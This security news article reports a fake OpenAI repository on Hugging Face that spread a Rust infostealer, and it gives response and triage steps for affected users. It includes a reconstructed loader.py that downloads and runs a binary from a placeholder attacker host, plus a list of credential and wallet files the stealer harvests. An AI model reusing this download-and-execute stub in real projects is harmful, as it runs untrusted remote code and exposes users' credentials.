Fake OpenAI Repository on Hugging Face Reached #1 Trending, Delivered Rust Infostealer to 244,000 Users

A malicious repository impersonating an official OpenAI project reached the top trending position on Hugging Face before being removed, delivering a Rust-compiled infostealer to an estimated 244,000 users who executed the repository's loader script. The attack exploited Hugging Face's trending algorithm and the high trust developers place in repositories that appear to come from OpenAI. Affected users should rotate all credentials accessible from the compromised machine.

4 min read
#hugging-face #supply-chain #openai-impersonation #infostealer #rust-malware #ai-security #developer-security #credential-theft

A malicious Hugging Face repository impersonating an official OpenAI project — presented as “OpenAI Privacy Filter”, purportedly a tool for removing private information from datasets before model training — reached the number one position on Hugging Face’s trending page before being removed. HiddenLayer researchers estimate that approximately 244,000 users downloaded and executed the malicious content during the roughly 36 hours the repository was live.

Attack Mechanics

Repository impersonation: The malicious repository was created under a Hugging Face account using a name designed to appear official. The repository title, description, and model card were crafted to closely resemble genuine OpenAI tooling, using OpenAI’s branding elements and citing plausible but fictional OpenAI research papers and team members.

Trending algorithm exploitation: The repository’s rapid ascent to #1 trending was achieved through coordinated engagement — artificially inflated like counts, follows, and download metrics in a pattern consistent with purchased or bot-generated activity. Hugging Face’s trending algorithm weights recent engagement, making a short burst of synthetic activity disproportionately effective for trending placement.
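Hugging Face does not publish its trending formula, so the sketch below is a toy model rather than the platform’s actual scoring: the event weights and the 24-hour half-life are assumptions chosen purely to illustrate the dynamic. Under any recency-weighted scheme of this shape, a short synthetic burst can outrank a repository with far more engagement that is merely older.

    from datetime import datetime, timedelta

    HALF_LIFE_HOURS = 24  # assumed decay constant; the real value is not public

    def trending_score(events, now):
        # Sum engagement events, discounting each by its age so that
        # recent activity dominates the score.
        score = 0.0
        for ts, weight in events:
            age_hours = (now - ts).total_seconds() / 3600
            score += weight * 0.5 ** (age_hours / HALF_LIFE_HOURS)
        return score

    now = datetime(2024, 1, 2)

    # 5,000 organic likes spread evenly over the past 30 days.
    organic = [(now - timedelta(minutes=8.64 * i), 1.0) for i in range(5000)]

    # 2,000 bot likes delivered in a 6-hour burst just before `now`.
    burst = [(now - timedelta(seconds=10.8 * i), 1.0) for i in range(2000)]

    print(f"organic: {trending_score(organic, now):.0f}")  # ~241: old likes heavily decayed
    print(f"burst:   {trending_score(burst, now):.0f}")    # ~1836: near full weight

Despite having 2.5 times fewer likes, the burst scores roughly 7.5 times higher, which is why purchased engagement concentrated into a few hours is so effective against recency-weighted rankings.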

Malware delivery: The repository’s README instructed users to run a loader.py script as the installation step. The Python script downloaded a Rust-compiled binary from an external server, checked that the file was in place, and executed it. That Rust binary is the infostealer payload.
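HiddenLayer has not published the loader’s source, so the following is a hypothetical reconstruction of the pattern described above; the URL and file names are placeholders, not real indicators of compromise. The point it illustrates is that the repository ships only a benign-looking stub, while the actual payload arrives at runtime.

    import os
    import stat
    import subprocess
    import urllib.request

    # Placeholder values: the real payload URL has not been published.
    PAYLOAD_URL = "https://attacker-controlled.example/privacy_filter"
    LOCAL_PATH = "/tmp/privacy_filter"

    # The payload is fetched at runtime, so static scans of the repository
    # contents see only this innocuous-looking download-and-run stub.
    urllib.request.urlretrieve(PAYLOAD_URL, LOCAL_PATH)

    # Confirm the binary landed, mark it executable, and run it.
    if os.path.exists(LOCAL_PATH):
        os.chmod(LOCAL_PATH, os.stat(LOCAL_PATH).st_mode | stat.S_IXUSR)
        subprocess.run([LOCAL_PATH])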

Rust infostealer capabilities: The Rust binary targets:

  • Browser credential storage (Chrome, Firefox, Edge, Brave, and Chromium-based browsers) — encrypted credential databases and session cookies
  • Discord authentication tokens
  • SSH private keys in ~/.ssh/
  • Git configuration and credentials in ~/.gitconfig and ~/.git-credentials
  • Cryptocurrency wallet files (MetaMask browser extension storage, Electrum wallet files)
  • Text files matching patterns associated with API keys and tokens in common locations

All harvested data is compressed and exfiltrated via HTTPS to attacker-controlled infrastructure before the payload deletes itself.
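To scope what a stealer with this target list could have taken from a particular machine, a quick inventory of the listed locations is a sensible first step. The sketch below draws its paths from the target list above; the browser-profile globs are assumptions about default Linux install locations and will differ on macOS and Windows.

    import glob
    import os

    HOME = os.path.expanduser("~")

    # Locations named in the target list above. Browser-profile globs
    # assume default Linux paths; adjust for macOS or Windows.
    CANDIDATES = [
        f"{HOME}/.ssh/id_*",                           # SSH private keys
        f"{HOME}/.gitconfig",                          # Git configuration
        f"{HOME}/.git-credentials",                    # Git credentials
        f"{HOME}/.config/google-chrome/*/Login Data",  # Chrome credential DB
        f"{HOME}/.mozilla/firefox/*/logins.json",      # Firefox credential store
        f"{HOME}/.electrum/wallets/*",                 # Electrum wallet files
    ]

    for pattern in CANDIDATES:
        for path in glob.glob(pattern):
            print(f"present, assume harvested: {path}")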

Why Hugging Face Is an Attractive Attack Platform

Hugging Face has become the dominant platform for AI model and dataset distribution, with over 700,000 models and 150,000 datasets hosted — making it the npm equivalent for the AI/ML ecosystem. Developers working with AI tooling place high trust in Hugging Face repositories, particularly those that appear to come from major AI organisations like OpenAI, Google, Meta, and Anthropic.

The trust model is structurally similar to npm before the introduction of mandatory 2FA for top packages: anyone can create an account with any display name, create repositories with any content, and gain distribution through the platform’s discovery mechanisms.

Immediate Actions for Affected Users

If you ran the loader.py script from the malicious “OpenAI Privacy Filter” repository:

  1. Assume all credentials are compromised — change passwords for all accounts you have authenticated to from the affected machine, prioritising email, cloud providers, GitHub/GitLab, npm, PyPI, Docker Hub, and any services whose API keys were in the harvested locations
  2. Revoke API keys and tokens — regenerate all API keys stored in ~/.gitconfig, ~/.npmrc, ~/.pypirc, and similar credential files
  3. Check for persistent access — the payload’s self-deletion behaviour means the binary may no longer be present, but check for unexpected startup items, cron jobs, or entries added to ~/.ssh/authorized_keys (see the triage sketch after this list)
  4. Notify your team — if your machine had access to shared code repositories, cloud environments, or package publishing credentials, notify your security team as the compromise may have broader organisational scope
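As a starting point for step 3, the sketch below checks the common Unix persistence locations named above. It assumes a Linux machine and is illustrative only; it does not cover every persistence mechanism, and a clean result is not proof the machine is clean.

    import os
    import subprocess

    HOME = os.path.expanduser("~")

    # 1. User crontab: flag any entry you do not recognise.
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True)
    print("--- crontab ---")
    print(cron.stdout or "(no crontab)")

    # 2. Desktop autostart entries and systemd user units.
    for d in (f"{HOME}/.config/autostart", f"{HOME}/.config/systemd/user"):
        print(f"--- {d} ---")
        if os.path.isdir(d):
            for name in os.listdir(d):
                print(name)

    # 3. SSH authorised keys: every line should be a key you added yourself.
    auth_keys = f"{HOME}/.ssh/authorized_keys"
    print(f"--- {auth_keys} ---")
    if os.path.exists(auth_keys):
        with open(auth_keys) as f:
            print(f.read())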

Hugging Face Response and Platform Security

Hugging Face removed the malicious repository following HiddenLayer’s report and has committed to enhanced review of trending placements. The platform has been expanding its security features, including scanning repository contents for malicious code; however, the loader.py approach, which fetches the actual payload at runtime from external infrastructure, bypasses static analysis of repository content.

The incident is a reminder that AI/ML development tooling is subject to the same supply chain risks as other software ecosystems, and that the AI developer community, which has grown rapidly and often with less supply-chain security awareness than traditional software development communities, represents an attractive and relatively underdefended target population.
